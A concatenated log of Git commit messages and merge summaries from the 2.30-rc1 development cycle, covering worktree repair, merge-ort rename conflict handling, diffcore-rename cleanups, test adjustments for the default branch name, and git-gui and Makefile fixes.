manually reads the ".git" gitfile at that location and, if it is
well-formed, extracts the <id>. It then searches for a corresponding
<id> in <repo>/worktrees/ and, if found, concludes that there is a
reasonable match and updates <repo>/worktrees/<id>/gitdir to point at
the specified worktree path. In order for <repo> to be known, `git
worktree repair` must be run in the main worktree or bare repository.
`git worktree repair` first attempts to repair each incoming
/path/to/worktree/.git gitfile to point at the repository, and then
attempts to repair outgoing <repo>/worktrees/<id>/gitdir files to point
at the worktrees. This sequence was chosen arbitrarily when originally
implemented since the order of fixes is immaterial as long as one side
of the two-way link between the repository and a worktree is sound.
However, for this new repair technique to work, the order must be
reversed. This is because the new inference mechanism, when it is
successful, allows the outgoing <repo>/worktrees/<id>/gitdir file to be
repaired, thus fixing one side of the two-way link. Once that side is
fixed, the other side can be fixed by the existing repair mechanism,
hence the order of repairs is now significant.
Two safeguards are employed to avoid hijacking a worktree from a
different repository if the user accidentally specifies a foreign
worktree as an argument. The first, as described above, is that it
requires an <id> match between the repository and the worktree. That
itself is not foolproof for preventing hijack, so the second safeguard
is that the inference will only kick in if the worktree's
/path/to/worktree/.git gitfile does not point at a repository.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit ba7eafe146 (t6030: explicitly test for bisection cleanup,
2017-09-29) introduced checks for files in the $GIT_DIR directory, but
that variable is not always defined, and in this test file it's not.
Therefore these checks always passed regardless of the presence of these
files (unless the user has some /BISECT_LOG file, for some reason).
Let's check the files in the correct location.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
* github/master: (42 commits)
Git 2.30-rc1
git-gui: use gray background for inactive text widgets
Another batch before 2.30-rc1
git-gui: Fix selected text colors
Makefile: conditionally include GIT-VERSION-FILE
git-gui: fix colored label backgrounds when using themed widgets
config.mak.uname: remove old NonStop compatibility settings
diff: correct interaction between --exit-code and -I<pattern>
t/perf: fix test_export() failure with BSD `sed`
style: do not "break" in switch() after "return"
compat-util: pretend that stub setitimer() always succeeds
strmap: make callers of strmap_remove() to call it in void context
doc: mention Python 3.x supports
index-format.txt: document v2 format of file system monitor extension
docs: multi-pack-index: remove note about future 'verify' work
init: provide useful advice about init.defaultBranch
get_default_branch_name(): prepare for showing some advice
branch -m: allow renaming a yet-unborn branch
init: document `init.defaultBranch` better
t7900: use --fixed-value in git-maintenance tests
...
"git diff -I<pattern> -exit-code" should exit with 0 status when
all the changes match the ignored pattern, but it didn't.
* jc/diff-I-status-fix:
diff: correct interaction between --exit-code and -I<pattern>
Our users are going to be trained to prepare for future change of
init.defaultBranch configuration variable.
* js/init-defaultbranch-advice:
init: provide useful advice about init.defaultBranch
get_default_branch_name(): prepare for showing some advice
branch -m: allow renaming a yet-unborn branch
init: document `init.defaultBranch` better
* https://github.com/prati0100/git-gui:
git-gui: use gray background for inactive text widgets
git-gui: Fix selected text colors
Makefile: conditionally include GIT-VERSION-FILE
git-gui: fix colored label backgrounds when using themed widgets
git-gui: ssh-askpass: add a checkbox to show the input text
git-gui: update Russian translation
git-gui: use commit message template
git-gui: Only touch GITGUI_MSG when needed
Set a different background color for selections in inactive widgets.
This inactive color is calculated from the current theme colors to make
sure it works for all themes.
* sh/inactive-background:
git-gui: use gray background for inactive text widgets
This makes it easier to see at a glance which of the four main views has the
keyboard focus.
Signed-off-by: Stefan Haller <stefan@haller-berlin.de>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
Build optimization.
* rj/make-clean:
Makefile: don't use a versioned temp distribution directory
Makefile: don't try to clean old debian build product
gitweb/Makefile: conditionally include ../GIT-VERSION-FILE
Documentation/Makefile: conditionally include ../GIT-VERSION-FILE
Documentation/Makefile: conditionally include doc.dep
Code clean-up.
* jk/oid-array-cleanup:
commit-graph: use size_t for array allocation and indexing
commit-graph: replace packed_oid_list with oid_array
commit-graph: drop count_distinct_commits() function
oid-array: provide a for-loop iterator
oid-array: make sort function public
cache.h: move hash/oid functions to hash.h
t0064: make duplicate tests more robust
t0064: drop sha1 mention from filename
oid-array.h: drop sha1 mention from header guard
Added selected state colors for text widget.
Same colors for active and inactive selection, to match previous
behaviour.
Signed-off-by: Serg Tereshchenko <serg.partizan@gmail.com>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
The 'clean' target is noticeably slow on cygwin, even for a 'do-nothing'
invocation of 'make clean'. For example, the second 'make clean' given
below:
$ make clean >/dev/null 2>&1
$ make clean
GITGUI_VERSION = 0.21.0.85.g3e5c
rm -rf git-gui lib/tclIndex po/*.msg
rm -rf GIT-VERSION-FILE GIT-GUI-VARS
$
has been timed at 1.934s on my laptop (an old core i5-4200M @ 2.50GHz,
8GB RAM, 1TB HDD).
Notice that the Makefile, as part of processing the 'clean' target, is
updating the 'GIT-VERSION-FILE' file. This is to ensure that the
$(GITGUI_VERSION) make variable is set, once that file had been included.
However, the 'clean' target does not use the $(GITGUI_VERSION) variable,
so this is wasted effort.
In order to eliminate such wasted effort, use the value of the internal
$(MAKECMDGOALS) variable to only '-include GIT-VERSION-FILE' when the
target is not 'clean'. (This drops the time down to 0.676s, on my laptop,
giving an improvement of 65.05%).
Signed-off-by: Ramsay Jones <ramsay@ramsayjones.plus.com>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
The aqua theme on Mac doesn't support changing the background color for labels
and frames [1]. Since the red, green, and yellow backgrounds of the labels for
unstaged and staged files and the diff pane are so important design elements of
git gui's main window, it's not acceptable for them to have grey backgrounds on
Mac.
To work around this, simply use non-themed widgets for all labels on Mac. This
is not a big problem because labels don't look extremely different between the
themed and non-themed versions. There are subtle differences, but they are not
as bad as having the wrong background color.
[1] https://stackoverflow.com/a/6723911
Signed-off-by: Stefan Haller <stefan@haller-berlin.de>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
The MKDIR_WO_TRAILING_SLASH and NO_SETITIMER options are no longer
needed on the NonStop platforms as both are now supported by the
oldest supported operating system revision.
Signed-off-by: Randall S. Becker <rsbecker@nexbridge.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Implement merge_incore_recursive(), mostly through the use of a new
helper function, merge_ort_internal(), which itself is based off
merge_recursive_internal() from merge-recursive.c.
This drops the number of failures in the testsuite when run under
GIT_TEST_MERGE_ALGORITHM=ort from around 1500 to 647.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In order to handle recursive merges, after merging merge-bases we need
to clear away most of the data we had built up but some of it needs to
be kept -- in particular the "output" field. Rename the function to
reflect its future change in use.
Further, since "reinitialize" means we'll be reusing the fields
immediately, take advantage of this to only partially clear maps,
leaving the hashtable allocated and pre-sized. (This may be slightly
out-of-order since the speedups aren't realized until there are far
more strmaps in use, but the patch submission process already went out
of order because of various questions and requests for strmap. Anyway,
see commit 6ccdfc2a20 ("strmap: enable faster clearing and reusing of
strmaps", 2020-11-05), for performance details about the use of
strmap_partial_clear().)
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a subsequent commit, we will implement the traditional recursiveness
that gave merge-recursive its name, namely merging non-unique
merge-bases to come up with a single virtual merge base. Copy a few
helper functions from merge-recursive.c that we will use in the
implementation.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Command `git pack-redundant --all` will crash if there is only one
packfile in the repository. This is because, if there is only one
packfile in local_packs, `cmp_local_packs` will do nothing and will
leave `pl->unique_objects` as uninitialized.
Also add testcases for repository with no packfile and one packfile
in t5323.
Reported-by: Daniel C. Klauer <daniel.c.klauer@web.de>
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 8164360fc8 (t9902: prepare a test for the upcoming default branch
name, 2020-10-23), we started adjusting this test script for the default
initial branch name changing to `main`.
However, there is no need to wait for that: let's adjust the test script
to stop relying on a specific initial branch name by setting it
explicitly. This allows us to drop the `PREPARE_FOR_MAIN_BRANCH` prereq
from one test case.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 66713e84e7 (tests: prepare aligned mentions of the default branch
name, 2020-10-23), we started adjusting this test script for the default
initial branch name changing to `main`.
However, there is no need to wait for that: let's adjust the test script
to stop relying on a specific initial branch name by setting it
explicitly. This allows us to drop the `PREPARE_FOR_MAIN_BRANCH` prereq
from six test cases.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 97cf8d50b5 (t5703: adjust a test case for the upcoming default
branch name, 2020-10-23), we prepared this test script for a world when
the default initial branch name would be `main`.
However, there is no need to wait for that: let's adjust the test script
to stop relying on a specific initial branch name by setting it
explicitly. This allows us to drop the `PREPARE_FOR_MAIN_BRANCH` prereq
from one test case.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 66713e84e7 (tests: prepare aligned mentions of the default branch
name, 2020-10-23), we prepared this test script for a time when the
default initial branch name would be `main`.
However, there is no need to wait for that: let's adjust the test script
to stop relying on a specific initial branch name by setting it
explicitly. This allows us to drop the `PREPARE_FOR_MAIN_BRANCH` prereq
from two test cases.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 66713e84e7 (tests: prepare aligned mentions of the default branch
name, 2020-10-23), we started that transition, trying to prepare for a
time when `git init` would use that name for the initial branch.
Even if that time has not arrived, we can complete the transition by
making the test script independent of the default branch name. This also
allows us to drop the `PREPARE_FOR_MAIN_BRANCH` prereq from four test
cases.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 66713e84e7 (tests: prepare aligned mentions of the default branch
name, 2020-10-23), we started that transition, trying to prepare for a
time when `git init` would use that name for the initial branch.
Even if that time has not arrived, we can complete the transition by
making the test script independent of the default branch name. This also
allows us to drop the `PREPARE_FOR_MAIN_BRANCH` prereq from one test
case.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 66713e84e7 (tests: prepare aligned mentions of the default branch
name, 2020-10-23), we started that transition, trying to prepare for a
time when `git init` would use that name for the initial branch.
Even if that time has not arrived, we can complete the transition by
making the test script independent of the default branch name. This also
allows us to drop the `PREPARE_FOR_MAIN_BRANCH` prereq from one test
case.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 66713e84e7 (tests: prepare aligned mentions of the default branch
name, 2020-10-23), we started that transition, trying to prepare for a
time when `git init` would use that name for the initial branch.
Even if that time has not arrived, we can complete the transition by
making the test script independent of the default branch name. This also
allows us to drop the `PREPARE_FOR_MAIN_BRANCH` prereq from one test
case.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 56300ff356 (t3200: prepare for `main` being shorter than `master`,
2020-10-23) and in 66713e84e7 (tests: prepare aligned mentions of the
default branch name, 2020-10-23), we started to prepare t3200 for a new
world where `git init` uses the branch name `main` for the initial
branch.
We do not even have to wait for that new world: we can easily ensure
that that branch name is used, independent of the exact name `git init`
will give the initial branch, so let's do that.
This also lets us remove the `PREPARE_FOR_MAIN_BRANCH` prereq from three
test cases in that script.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 3224b0f0bb (t1400: prepare for `main` being default branch name,
2020-10-23), we prepared t1400 for a time when the default initial
branch name would be `main`.
However, there is no need to wait that long: let's adjust the test
script to stop relying on a specific initial branch name by setting it
explicitly. This allows us to drop the `PREPARE_FOR_MAIN_BRANCH` prereq
from two test cases.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Just like "git diff -w --exit-code" should exit with 0 when ignoring
whitespace differences results in no changes shown, if ignoring
certain changes with "git diff -I<pattern> --exit-code" result in an
empty patch, we should exit with 0.
The test suite did not cover the interaction between "--exit-code"
and "-w"; add one while adding a new test for "--exit-code" + "-I".
Signed-off-by: Junio C Hamano <gitster@pobox.com>
test_perf() runs each test in its own subshell which makes it difficult
to persist variables between tests. test_export() addresses this
shortcoming by grabbing the values of specified variables after a test
runs but before the subshell exits, and writes those values to a file
which is loaded into the environment of subsequent tests.
To grab the values to be persisted, test_export() pipes the output of
the shell's builtin `set` command through `sed` which plucks them out
using a regular expression along the lines of `s/^(var1|var2)/.../p`.
Unfortunately, though, this use of alternation is not portable. For
instance, BSD-lineage `sed` (including macOS `sed`) does not support it
in the default "basic regular expression" mode (BRE). It may be possible
to enable "extended regular expression" mode (ERE) in some cases with
`sed -E`, however, `-E` is neither portable nor part of POSIX.
Fortunately, alternation is unnecessary in this case and can easily be
avoided, so replace it with a series of simple expressions such as
`s/^var1/.../p;s/^var2/.../p`.
While at it, tighten the expressions so they match the variable names
exactly rather than matching prefixes (i.e. use `s/^var1=/.../p`).
If the requirements of test_export() become more complex in the future,
then an alternative would be to replace `sed` with `perl` which supports
alternation on all platforms, however, the simple elimination of
alternation via multiple `sed` expressions suffices for the present.
Reported-by: Sangeeta <sangunb09@gmail.com>
Diagnosed-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There's no need to display the annoying warning on every pull... only
the ones that are not fast-forward.
The current warning tests still pass, but not because of the arguments
or the configuration, but because they are all fast-forward.
We need to test non-fast-forward situations now.
Suggestions-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Refactor the advise() call that teaches users how they can choose
between merge and rebase into a helper function. This revealed that
the caller's logic needs to be further clarified to allow future
actions (like "erroring out" instead of the current "go ahead and
merge anyway") that should happen whether the advice message is
squelched out.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is easy enough to do, and gives a more descriptive name to the
variable that is scoped in a more focused way.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Implement cases where renames are involved in type changes (i.e. the
side of history that didn't rename the file changed its type from a
regular file to a symlink or submodule). There was some code to handle
this in merge-recursive but only in the special case when the renamed
file had no content changes. The code here works differently -- it
knows process_entry() can handle mode conflicts, so it does a few
minimal tweaks to ensure process_entry() can just finish the job as
needed.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Implement handling of normal renames. This code replaces the following
from merge-recurisve.c:
* the code relevant to RENAME_NORMAL in process_renames()
* the RENAME_NORMAL case of process_entry()
Also, there is some shared code from merge-recursive.c for multiple
different rename cases which we will no longer need for this case (or
other rename cases):
* handle_rename_normal()
* setup_rename_conflict_info()
The consolidation of four separate codepaths into one is made possible
by a change in design: process_renames() tweaks the conflict_info
entries within opt->priv->paths such that process_entry() can then
handle all the non-rename conflict types (directory/file, modify/delete,
etc.) orthogonally. This means we're much less likely to miss special
implementation of some kind of combination of conflict types (see
commits brought in by 66c62eaec6 ("Merge branch 'en/merge-tests'",
2020-11-18), especially commit ef52778708 ("merge tests: expect improved
directory/file conflict handling in ort", 2020-10-26) for more details).
That, together with letting worktree/index updating be handled
orthogonally in the merge_switch_to_result() function, dramatically
simplifies the code for various special rename cases.
(To be fair, the code for handling normal renames wasn't all that
complicated beforehand, but it's still much simpler now.)
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Implement rename/rename(2to1) and rename/add handling, i.e. a file is
renamed into a location where another file is added (with that other
file either being a plain add or itself coming from a rename). Note
that rename collisions can also have a special case stacked on top: the
file being renamed on one side of history is deleted on the other
(yielding either a rename/add/delete conflict or perhaps a
rename/rename(2to1)/delete[/delete]) conflict.
One thing to note here is that when there is a double rename, the code
in question only handles one of them at a time; a later iteration
through the loop will handle the other. After they've both been
handled, process_entry()'s normal add/add code can handle the collision.
This code replaces the following from merge-recurisve.c:
* all the 2to1 code in process_renames()
* the RENAME_TWO_FILES_TO_ONE case of process_entry()
* handle_rename_rename_2to1()
* handle_rename_add()
Also, there is some shared code from merge-recursive.c for multiple
different rename cases which we will no longer need for this case (or
other rename cases):
* handle_file_collision()
* setup_rename_conflict_info()
The consolidation of six separate codepaths into one is made possible
by a change in design: process_renames() tweaks the conflict_info
entries within opt->priv->paths such that process_entry() can then
handle all the non-rename conflict types (directory/file, modify/delete,
etc.) orthogonally. This means we're much less likely to miss special
implementation of some kind of combination of conflict types (see
commits brought in by 66c62eaec6 ("Merge branch 'en/merge-tests'",
2020-11-18), especially commit ef52778708 ("merge tests: expect improved
directory/file conflict handling in ort", 2020-10-26) for more details).
That, together with letting worktree/index updating be handled
orthogonally in the merge_switch_to_result() function, dramatically
simplifies the code for various special rename cases.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Implement rename/delete conflicts, i.e. one side renames a file and the
other deletes the file. This code replaces the following from
merge-recurisve.c:
* the code relevant to RENAME_DELETE in process_renames()
* the RENAME_DELETE case of process_entry()
* handle_rename_delete()
Also, there is some shared code from merge-recursive.c for multiple
different rename cases which we will no longer need for this case (or
other rename cases):
* handle_change_delete()
* setup_rename_conflict_info()
The consolidation of five separate codepaths into one is made possible
by a change in design: process_renames() tweaks the conflict_info
entries within opt->priv->paths such that process_entry() can then
handle all the non-rename conflict types (directory/file, modify/delete,
etc.) orthogonally. This means we're much less likely to miss special
implementation of some kind of combination of conflict types (see
commits brought in by 66c62eaec6 ("Merge branch 'en/merge-tests'",
2020-11-18), especially commit ef52778708 ("merge tests: expect improved
directory/file conflict handling in ort", 2020-10-26) for more details).
That, together with letting worktree/index updating be handled
orthogonally in the merge_switch_to_result() function, dramatically
simplifies the code for various special rename cases.
To be fair, there is a _slight_ tweak to process_entry() here, because
rename/delete cases will also trigger the modify/delete codepath.
However, we only want a modify/delete message to be printed for a
rename/delete conflict if there is a content change in the renamed file
in addition to the rename. So process_renames() and process_entry()
aren't quite fully orthogonal, but they are pretty close.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Implement rename/rename(1to2) handling, i.e. both sides of history
renaming a file and rename it differently. This code replaces the
following from merge-recurisve.c:
* all the 1to2 code in process_renames()
* the RENAME_ONE_FILE_TO_TWO case of process_entry()
* handle_rename_rename_1to2()
Also, there is some shared code from merge-recursive.c for multiple
different rename cases which we will no longer need for this case (or
other rename cases):
* handle_file_collision()
* setup_rename_conflict_info()
The consolidation of five separate codepaths into one is made possible
by a change in design: process_renames() tweaks the conflict_info
entries within opt->priv->paths such that process_entry() can then
handle all the non-rename conflict types (directory/file, modify/delete,
etc.) orthogonally. This means we're much less likely to miss special
implementation of some kind of combination of conflict types (see
commits brought in by 66c62eaec6 ("Merge branch 'en/merge-tests'",
2020-11-18), especially commit ef52778708 ("merge tests: expect improved
directory/file conflict handling in ort", 2020-10-26) for more details).
That, together with letting worktree/index updating be handled
orthogonally in the merge_switch_to_result() function, dramatically
simplifies the code for various special rename cases.
To be fair, there is a _slight_ tweak to process_entry() here to make
sure that the two different paths aren't marked as clean but are left in
a conflicted state. So process_renames() and process_entry() aren't
quite entirely orthogonal, but they are pretty close.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Implement rename/rename(1to1) handling, i.e. both sides of history
renaming a file but renaming the same way. This code replaces the
following from merge-recurisve.c:
* all the 1to1 code in process_renames()
* the RENAME_ONE_FILE_TO_ONE case of process_entry()
Also, there is some shared code from merge-recursive.c for multiple
different rename cases which we will no longer need for this case (or
other rename cases):
* handle_rename_normal()
* setup_rename_conflict_info()
The consolidation of four separate codepaths into one is made possible
by a change in design: process_renames() tweaks the conflict_info
entries within opt->priv->paths such that process_entry() can then
handle all the non-rename conflict types (directory/file, modify/delete,
etc.) orthogonally. This means we're much less likely to miss special
implementation of some kind of combination of conflict types (see
commits brought in by 66c62eaec6 ("Merge branch 'en/merge-tests'",
2020-11-18), especially commit ef52778708 ("merge tests: expect improved
directory/file conflict handling in ort", 2020-10-26) for more details).
That, together with letting worktree/index updating be handled
orthogonally in the merge_switch_to_result() function, dramatically
simplifies the code for various special rename cases.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove this unreachable code. It was found by SunCC, it's found by a
non-fatal warning emitted by SunCC. It's one of the things it's more
vehement about than GCC & Clang.
It complains about a lot of other similarly unreachable code, e.g. a
BUG(...) without a "return", and a "return 0" after a long if/else,
both of whom have "return" statements. Those are also genuine
redundancies to a compiler, but arguably make the code a bit easier to
read & less fragile to maintain.
These return/break cases are just unnecessary however, and as seen
here the surrounding code just did a plain "return" without a "break"
already.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When 15b52a44 (compat-util: type-check parameters of no-op
replacement functions, 2020-08-06) turned a handful of no-op
C-preprocessor macros into static inline functions to give the
callers a better type checking for their parameters, it forgot
to return anything from the stubbed out setitimer() function,
even though the function was defined to return an int just like the
real thing.
Since the original C-preprocessor macro implementation was to just
turn the call to the function an empty statement, we know that the
existing callers do not check the return value from it, and it does
not matter what value we return. But it is safer to pretend that
the call succeeded by returning 0 than making it fail by returning -1
and clobbering errno with some value.
Reported-by: Randall S. Becker <rsbecker@nexbridge.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Two "static inline" functions, both of which return void, call
strmap_remove() and tries to return the value it returns as their
return value, which is just bogus, as strmap_remove() returns void
itself. Call it in the void context and fall-thru the control to
the end instead.
Reported-by: Randall S. Becker <rsbecker@nexbridge.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The subcommand is unusably slow and the reason why nobody reports it
as a performance bug is suspected to be the absense of users. Let's
show a big message that asks the user to tell us that they still
care about the command when an attempt is made to run the command,
with an escape hatch to override it with a command line option.
In a few releases, we may turn it into an error and keep it for a
few more releases before finally removing it (during the whole time,
the plan to remove it would be interrupted by end user raising hand).
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 0b4396f068, (git-p4: make python2.7 the oldest supported version,
2019-12-13) pointed out that git-p4 uses Python 2.7-or-later features
in the code.
In addition, git-p4 gained enough support for Python 3 from
6cec21a82f, (git-p4: encode/decode communication with p4 for
python3, 2019-12-13).
Let's update our documentation to reflect that fact.
Signed-off-by: Đoàn Trần Công Danh <congdanhqx@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Test update.
* js/t5526-with-no-particular-primary-branch-name:
t5526: drop the prereq expecting the default branch name `main`
t5526: avoid depending on a specific default branch name
Tighten error checking in the codepath that responds to "git fetch".
* jk/check-config-parsing-error-in-upload-pack:
upload-pack: propagate return value from object filter config callback
Newer versions of xsltproc can assign IDs in HTML documents it
generates in a consistent manner. Use the feature to help format
HTML version of the user manual reproducibly.
* ae/doc-reproducible-html:
doc: make HTML manual reproducible
The glossary described a branch as an "active" line of development,
which is misleading---a stale and non-moving branch is still a
branch.
* so/glossary-branch-is-not-necessarily-active:
glossary: improve "branch" definition
"@" sometimes worked (e.g. "git push origin @:there") as a part of
a refspec element, but "git push origin @" did not work, which has
been corrected.
* fc/atmark-in-refspec:
refspec: make @ a synonym of HEAD
tests: push: trivial cleanup
tests: push: improve cleanup of HEAD tests
"git $cmd $args", when $cmd is not a recognised subcommand, by
default tries to see if $cmd is a typo of an existing subcommand
and optionally executes the corrected command if there is only one
possibility, depending on the setting of help.autocorrect; the
users can now disable the whole thing, including the cycles spent
to find a likely typo, by setting the configuration variable to
'never'.
* dd/help-autocorrect-never:
help.c: help.autocorrect=never means "do not compute suggestions"
register_rename_src() simply references the passed pair inside
rename_src. In contrast, add_rename_dst() did something entirely
different for rename_dst. Instead of copying the passed pair, it made a
copy of the second diff_filespec from the passed pair, referenced it,
and then set the diff_rename_dst.pair field to NULL. Later, when a
pairing is found, record_rename_pair() allocated a full diff_filepair
via diff_queue() and pointed its src and dst fields at the appropriate
diff_filespecs. This contrast between register_rename_src() for the
rename_src data structure and add_rename_dst() for the rename_dst data
structure is oddly inconsistent and requires more memory and work than
necessary. Let's just reference the original diff_filepair in
rename_dst as-is, just as we do with rename_src. Add a new
rename_dst.is_rename field, since the rename_dst.p field is never NULL
unlike the old rename_dst.pair field.
Taking advantage of this change and the fact that same-named paths will
be adjacent, we can get rid of the sorting of the array and most of the
lookups on it, allowing us to instead just append as we go. However,
there is one remaining reason to still keep locate_rename_dst():
handling broken pairs (i.e. when break detection is on). Those are
somewhat rare, but we can set up a simple strintmap to get the map
between the source and the index. Doing that allows us to still have a
fast lookup without sorting the rename_dst array. Since the sorting had
been done in a weakly quadratic manner, when many renames are involved
this time could add up.
There is still a strcmp() in add_rename_dst() that I have left in place
to make it easier to verify that the algorithm has the same results.
This strcmp() is there to check for duplicate destination entries (which
was the easiest way at the time to avoid segfaults in the
diffcore-rename code when trees had multiple entries at a given path).
The underlying double free()s are no longer an issue with the new
algorithm, but that can be addressed in a subsequent commit.
This patch is being submitted in a different order than its original
development, but in a large rebase of many commits with lots of renames
and with several optimizations to inexact rename detection, both setup
time and write back to output queue time from diffcore_rename() were
sizeable chunks of overall runtime. This patch accelerated the setup
time by about 65%, and final write back to the output queue time by
about 50%, resulting in an overall drop of 3.5% on the execution time of
rebasing a few dozen patches.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
register_rename_src() took pains to create an array in rename_src which
was sorted by pathname of the contained diff_filepair. The sorting was
entirely unnecessary since callers pass filepairs to us in sorted
order. We can simply append to the end of the rename_src array,
speeding up diffcore_rename() setup time.
Also, note that I dropped the return type on the function since it was
unconditionally discarded anyway.
This patch is being submitted in a different order than its original
development, but in a large rebase of many commits with lots of renames
and with several optimizations to inexact rename detection,
diffcore_rename() setup time was a sizeable chunk of overall runtime.
This patch dropped execution time of rebasing 35 commits with lots of
renames by 2% overall.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
While creating the last commit, I found a number of other cases where
git would segfault when faced with trees that have duplicate entries.
None of these segfaults are in the diffcore-rename code (they all occur
in cache-tree and unpack-trees). Further, to my knowledge, no one has
ever been adversely affected by these bugs, and given that it has been
15 years and folks have fixed a few other issues with historical
duplicate entries (as noted in the last commit), I am not sure we will
ever run into anyone having problems with these. So I am not sure these
are worth fixing, but it doesn't hurt to at least document these
failures in the same test file that is concerned with duplicate tree
entries.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 4d6be03b95 ("diffcore-rename: avoid processing duplicate
destinations", 2015-02-26) added t4058 to demonstrate that a workaround
it added to avoid double frees (namely to just turn off rename detection
when trees had duplicate entries) would indeed avoid segfaults. The
tests, though, give the impression that the expected diffs are "correct"
when in reality they are just "don't segfault, and do something
semi-reasonable under the circumstances". Add some notes to make this
clearer.
Also, commit 25d5ea410f ("[PATCH] Redo rename/copy detection logic.",
2005-05-24) added a similar workaround to avoid segfaults, but for
rename_src rather than rename_dst. I do not see any tests in the
testsuite to cover the collision detection of entries limited to the
source side, so add a couple.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Inexact rename detection works by comparing all sources to all
destinations, computing similarities, and then finding the best matches
among those that are sufficiently similar.
However, it is preceded by exact rename detection that works by
checking if there are files with identical hashes. If exact renames are
found, we can exclude some files from inexact rename detection.
The inexact rename detection loops over the full set of files, but
immediately skips those for which rename_dst[i].is_rename is true and
thus doesn't compare any sources to that destination. As such, these
paths shouldn't be included in the progress counter.
For the eagle eyed, this change hints at an actual optimization -- the
first one I presented at Git Merge 2020. I'll be submitting that
optimization later, once the basic merge-ort algorithm has merged.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
diffcore-rename had two different checks of the form
if ((a < limit || b < limit) &&
a * b <= limit * limit)
This can be simplified to
if (st_mult(a, b) <= st_mult(limit, limit))
which makes it clearer how we are checking for overflow, and makes it
much easier to parse given the drop from 8 to 4 variable appearances.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
too_many_rename_candidates() got the number of rename destinations via
an argument to the function, but the number of rename sources via a
global variable. That felt rather inconsistent. Pass in the number of
rename sources as an argument as well.
While we are at it... We had a local variable, num_src, that served two
purposes. Initially it was set to the global value, but later was used
for counting a subset of the number of sources. Since we now have a
function argument for the former usage, introduce a clearer variable
name for the latter usage.
This patch has no behavioral changes; it's just renaming and passing an
argument instead of grabbing it from the global namespace. (You may
find it easier to view the patch using git diff's --color-words option.)
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our main data structures are rename_src and rename_dst. For counters of
these data structures, num_sources and num_destinations seem natural;
definitely more so than using num_create for the latter.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Eventually we want to be omit the advice when we can fast-forward
in which case there is no reason to require the user to choose
between rebase or merge.
In order to do so, we need to delay giving the advice up to the
point where we can check if we can fast-forward or not.
Additionally, config_get_rebase() was probably never its true home.
